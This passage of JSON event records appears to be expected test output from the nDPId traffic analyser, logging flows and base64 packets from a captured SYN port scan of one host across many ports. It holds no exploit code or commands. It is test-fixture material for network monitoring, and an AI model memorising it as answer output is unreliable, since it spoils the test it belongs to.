-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAs3SUAACkGQk2sEAAIQA2GNIzSBR3dUoMYAAAAAGACCAArcgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsDlsAADMGBxisEAAIQA2GNIzSH0ndUoMYAAAAAGACEAAJRgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAswGIAADAGWBCsEAAIQA2GNIzSEPfdUoMYAAAAAGACBAAjmAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsercAADEGnLusEAAIQA2GNIzSI1rdUoMYAAAAAGACCAANNQAAAgQFtA=="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1278275059462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275059462,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACABQjNJ7XAKI3VKDGWASFtCjyQAAAgQFZAAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAstMUAACUGbq2sEAAIQA2GNIzSD0HdUoMYAAAAAGACCAAhTgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsfagAAC8Gm8qsEAAIQA2GNIzSHcndUoMYAAAAAGACEAAKxgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsrK8AADQGZ8OsEAAIQA2GNIzSJxTdUoMYAAAAAGACBAANewAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsLFMAADMG6R+sEAAIQA2GNIzSGnvdUoMYAAAAAGACEAAOFAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsE3gAADkG+\/qsEAAIQA2GNIzSF2\/dUoMYAAAAAGACCAAZIAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsscoAACYGcKisEAAIQA2GNIzSFrLdUoMYAAAAAGACDAAV3QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsQukAACYG34msEAAIQA2GNIzSI43dUoMYAAAAAGACDAAJAgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAs7GYAADIGKgysEAAIQA2GNIzSAu3dUoMYAAAAAGACDAApogAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAstAUAADoGWm2sEAAIQA2GNIzSBRXdUoMYAAAAAGACDAAnegAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAs55oAADAGMNisEAAIQA2GNIzSH0LdUoMYAAAAAGACBAAVTQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsdFgAADoGmhqsEAAIQA2GNIzSH6PdUoMYAAAAAGACDAAM7AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAswkMAADQGUi+sEAAIQA2GNIzSC9bdUoMYAAAAAGACBAAouQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059516,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059516,"pkt":"ACYLMQczACWzv5HuCABFAAAsixEAADEGjGGsEAAIQA2GNIzSBAfdUoMYAAAAAGACCAAsiAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059516,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059516,"pkt":"ACYLMQczACWzv5HuCABFAAAsfV4AADkGkhSsEAAIQA2GNIzSCADdUoMYAAAAAGACCAAojwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059516,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059516,"pkt":"ACYLMQczACWzv5HuCABFAAAsleYAAC8Gg4ysEAAIQA2GNIzSGZPdUoMYAAAAAGACEAAO\/AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAsdRgAADgGm1qsEAAIQA2GNIzTBAzdU4MZAAAAAGACBAAwgAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAs8c8AAC8GJ6OsEAAIQA2GNIzTTiXdU4MZAAAAAGACEADaZgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAs1WcAADIGQQusEAAIQA2GNIzT2TDdU4MZAAAAAGACDABTWwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAsusMAACYGZ6+sEAAIQA2GNIzTIGTdU4MZAAAAAGACDAAMKAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAsMsoAADoG26isEAAIQA2GNIzTJxHdU4MZAAAAAGACDAAFewAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 